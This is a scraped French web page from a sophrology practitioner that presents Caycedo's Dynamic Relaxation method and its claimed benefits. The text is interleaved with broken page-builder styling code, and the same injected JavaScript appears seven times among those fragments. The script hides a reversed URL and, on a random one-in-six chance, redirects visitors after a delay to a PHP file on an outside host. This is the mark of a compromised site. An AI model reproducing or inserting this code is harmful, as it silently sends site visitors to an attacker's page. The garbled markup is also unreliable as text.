) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1494840410103{background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;} »]

 »Développement

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom » line_height= »5″ line_color= »#92d64a » line_width= »40″ spacer_margin= »margin-bottom:20px; »]

La sophrologie vous propose par le biais du premier cycle des Relaxations Dynamiques de Caycedo, un cheminement doux et progressif vers une meilleure connaissance de vous-même.

Les bienfaits sont multiples:
Renforcer ses capacités et ses potentiels , apprendre à gérer ses émotions, lutter contre la nervosité, libérer la culpabilité, améliorer l’estime de soi, apprendre à s’accepter et à se respecter, se faire confiance, affirmer ses comportements, faire des choix, décider, prendre conscience de ses valeurs, apprendre à connaître l’autre…

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1598389539270{background-image: url(http://sophrologie-dahan.fr/wp-content/uploads/2020/08/Depositphotos_146934277_l-2015.jpg?id=12522) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;} »]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1494599160628{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;} »]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1494599864298{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;} »]

 »Le

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom » line_height= »5″ line_color= »#92d64a » line_width= »40″ spacer_margin= »margin-bottom:20px; »]

Le cheminement sophrologique propose une véritable pédagogie, un apprentissage pour être. Cette pédagogie se fonde sur la pratique d’exercices basés

  • sur une utilisation de la capacité respiratoire et de ses différentes possibilités,
  •  basé sur l’installation dans différentes postures statiques ou dynamiques, permettant de s’installer dans un état de vigilance particulière où le champ de conscience est bien présent à ce qu’il vit
  • mais aussi sur la pratique de mouvements physiques réalisés en pleine conscience,
  • et sur l’utilisation des capacités d’imagination, de mémorisation, ou de visualisation.

Chaque exercice est fait pour stimuler une expérience particulière, créer un phénomène qui est propre à chacun. Le phénomène est ensuite étudié et exploité de manière à ce qu’il serve à l’individu dans son quotidien.

Nous commençons par apprendre à connaitre ce que nous avons comme possibilités en nous-mêmes (nos capacités physiques et psychiques). Puis nous apprenons à utiliser ce potentiel pour nous sentir mieux. Au fur et à mesure de la pratique des exercices sophrologiques, ce potentiel s’accroît et nous devenons ainsi plus acteur de notre vie et de notre existence. Jusqu’au moment où nous avons saisi ce que veut dire « être » ce que nous sommes, présents à ce que l’on vit, en accord profond avec tous les aspects de soi, à savoir le corps physique et ses besoins, l’esprit et ses désirs, la conscience et ses manifestations.

La sophrologie représente aussi bien l’apprentissage d’un savoir-faire pour gérer les situations difficiles rencontrées dans sa vie, qu’une hygiène de l’esprit et du corps au quotidien par l’aspect méditatif qu’elle contient, comme on se lave les dents tous les jours pour en maintenir leur propreté. Elle permet de perfectionner son savoir-être dans la vie afin d’apprécier le plus complètement possible son existence.

Le cheminement sophrologique, c’est la découverte d’une route en soi qui mène à Soi.